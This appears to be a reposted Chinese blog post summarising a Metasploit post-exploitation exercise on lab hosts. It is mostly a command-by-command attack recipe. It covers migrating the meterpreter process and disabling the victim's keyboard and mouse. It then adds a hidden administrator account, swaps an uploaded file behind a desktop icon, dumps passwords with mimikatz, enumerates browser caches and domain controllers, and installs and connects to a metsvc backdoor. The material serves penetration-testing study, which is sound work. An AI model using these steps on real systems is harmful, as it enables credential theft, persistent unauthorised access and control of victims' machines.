主机渗透复盘总结-后渗透

总结流程:

     1-ip获取,互相通信
 2-进入接口-msf武器库
 3-挑选武器-exploit模块
 4-装填子弹paypload模块
 5-后渗透meterpreter模块

进程迁移:

  1. 输入 ps 命令 (获取目标机正在运行的进程)

  2. 输入 getpid 命令(查看本机meterpreter shell的进程号)

  3. 将meterpreter进程迁移到受害机稳定的进程内,这里选择进程号为3524的进程

  4. uictl开关键盘/鼠标,顾明思意。disable关;enable开、keybord键盘、mouse鼠标

  5. 关闭它的鼠标,和键盘功能

  6. 受害机的鼠标点击功能失效,键盘输入失效

  7. 查看受害机当前处于的目录

  8. 进行文件上传

  9. 远程连接桌面,添加用户账号 net user apple hkb /add
    添加刚刚创建的用户到管理组 net localgroup administrators apple /add
  10. 远程登录 :rdesktop 192.168.73.129,将上传的文件图标改成桌面程序的图标,然后进行偷换。

  11. mimikatz抓取密码,load mimikatz加载

  12. 获取密码,wdigest

信息收集:常用脚本

run post/windows/gather/checkvm #是否虚拟机
run post/linux/gather/checkvm #是否虚拟机
run post/windows/gather/forensics/enum_drives #查看分区
run post/windows/gather/enum_applications #获取安装软件信息
run post/windows/gather/dumplinks #获取最近的文件操作
run post/windows/gather/enum_ie #获取IE缓存
run post/windows/gather/enum_chrome #获取Chrome缓存
run post/windows/gather/enum_patches #补丁信息
run post/windows/gather/enum_domain #查找域控

总结:

进程迁移的重要性,后渗透主要是metaploit工具的使用,思路目的较为重要。
植入后门·;run metsvc –h # 查看帮助
run metsvc –A #自动安装后门

连接后门·;msf > use exploit/multi/handler
msf > set payload windows/metsvc_bind_tcp
msf > set RHOST 192.168.159.144
msf > set LPORT 31337
msf > exploit

最后分享后渗透学习网址(后渗透之meterpreter使用攻略):https://xz.aliyun.com/t/2536

猜你喜欢

转载自www.cnblogs.com/kbhome/p/12535026.html
今日推荐